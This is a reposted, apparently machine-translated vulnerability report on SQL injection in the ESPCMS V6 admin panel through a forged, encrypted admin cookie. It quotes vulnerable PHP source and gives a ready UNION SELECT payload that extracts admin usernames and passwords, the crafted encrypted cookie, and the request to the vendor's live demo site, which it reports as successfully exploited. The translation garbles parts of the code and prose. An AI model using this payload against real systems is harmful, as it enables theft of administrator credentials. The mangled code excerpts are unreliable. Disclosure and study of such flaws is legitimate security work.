ESPCMS SQL injection (demo successful)

Source: Internet
Author: User

ESPCMS SQL injection (demo successful)

Rt
V6.0.14.07.07 UTF8

Detailed description:

I have read the WooYun: ESPCMS latest V5.8.14.03.03 UTF8 official version of brute force injection submitted by Daniel

See the latest version and find that the encryption function is still the same --

However, the query is changed to id instead of username,

However, the id is intval.

function member_cookieview($keyword = false) {
$retrunstr = array();
$retrunstr['username'] = $this->fun->eccode($this->fun->accept('ecisp_member_username', 'C'), 'DECODE', db_pscode);
$user_info = explode('|', $this->fun->eccode($this->fun->accept('ecisp_member_info', 'C'), 'DECODE', db_pscode));

list($retrunstr['userid'], $retrunstr['alias'], $retrunstr['integral'], $retrunstr['mcid'], $retrunstr['email'], $retrunstr['lastip'], $retrunstr['ipadd'], $retrunstr['useragent'], $retrunstr['adminclassurl']) = $user_info;

$retrunstr['userid'] = intval($retrunstr['userid']);
$retrunstr['integral'] = intval($retrunstr['integral']);
$retrunstr['mcid'] = intval($retrunstr['mcid']);

return !$keyword ? $retrunstr : $retrunstr[$keyword];
}



I did not find the color pen in the foreground using cookie injection, but the background detected a problem with the management login file.

/Adminsoft/control/management. php

function onhome() {
parent::start_template();

$db_table = db_prefix . 'admin_member';
$db_where = "username='$this->esp_username'";
$rsMember = $this->db->fetch_first('SELECT id,username,password,name,sex,intotime,intime,outtime,ipadd,hit,powergroup,inputclassid,isclass FROM ' . $db_table . ' WHERE ' . $db_where);
$this->ectemplates->assign('username', $rsMember['username']);
$this->ectemplates->assign('name', $rsMember['name']);
if ($rsMember['sex'] == 1) {
$rsMember['sextype'] = $this->lng['select_sex_1'];
} else {
$rsMember['sextype'] = $this->lng['select_sex_0'];
}


$db_table = db_prefix . 'admin_powergroup';
if (empty($rsMember['powergroup']) && empty($rsMember['username'])) {
exit('Cookie err');
}
$db_where = 'id=' . $rsMember['powergroup'];
..............



Here, username is included in the query. Of course, to meet admin_purview ()

$ Arr_purview = explode ('|', $ this-> fun-> eccode ($ ecisp_admininfo, 'decode', db_pscode ));

$ This-> esp_powerlist = explode ('|', $ this-> fun-> eccode ($ esp_powerlist, 'decode', db_pscode ));

List ($ esp_adminuserid, $ this-> esp_username, $ this-> esp_password, $ this-> esp_useragent, $ esp_powerid, $ esp_inputclassid, $ this-> esp_softurl) = $ arr_purview; // esp_username is assigned here to cause Injection
.................
If (empty ($ this-> esp_username) | empty ($ this-> esp_adminuserid) | md5 (admin_AGENT )! = $ This-> esp_useragent | md5 (admin_ClassURL )! = $ This-> esp_softurl) // this condition must be met as before.



Obtain the key using @ Somalia's pirate method and construct a malicious cookie to inject it.

Under the official website test, we won't talk much about the process of getting the key. Stamp here WooYun: ESPCMS latest V5.8.14.03.03 UTF8 official version of brute force injection.



Normally, the decrypted cookie is like this.

1 | admin | md5 (pass) | md5 (admin_AGENT) | 1 | 1 | md5 (admin_ClassURL)



Replace admin with an SQL statement, and change the next two md5 values as follows:

Cookie

1|' union select 1,username,3,password,5,6,7,8,9,10,11,12,13 from espcms_admin_member#|a|a32b0be10848d387fcc64b92239d689f|1|1|29aac6e385cf17b8d63035edfbe068af



Built-in function encryption->

ecisp_admininfo=Zt5YVtnSmaGmWKqe0sbH2FGUkKzUyKfQk9LGjpSO0sOp1t3V1pZhbWGYXW2QnFxrZGlnZZeSkJVjj5Vqgcmn0Z-FxtXRxc_VlcTK082glKWaz5Ob1oesk7SZamvIkcbJYpOca5nHaJppy8TFl5bEm2iVmZ_IaG1xm95ispXgYmuZmZpvy5ScmZTJlW7Dm5mYZZWUl8bGyMSbk5yexZg



Call adminsoft/control/management. php onhome

Http://demo.ecisp.cn/adminsoft/index.php? Archive = management & action = home

Modify the cookie. Well, the data has come out.

Proof of vulnerability:

Solution:

For Mao, do not change the algorithm

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.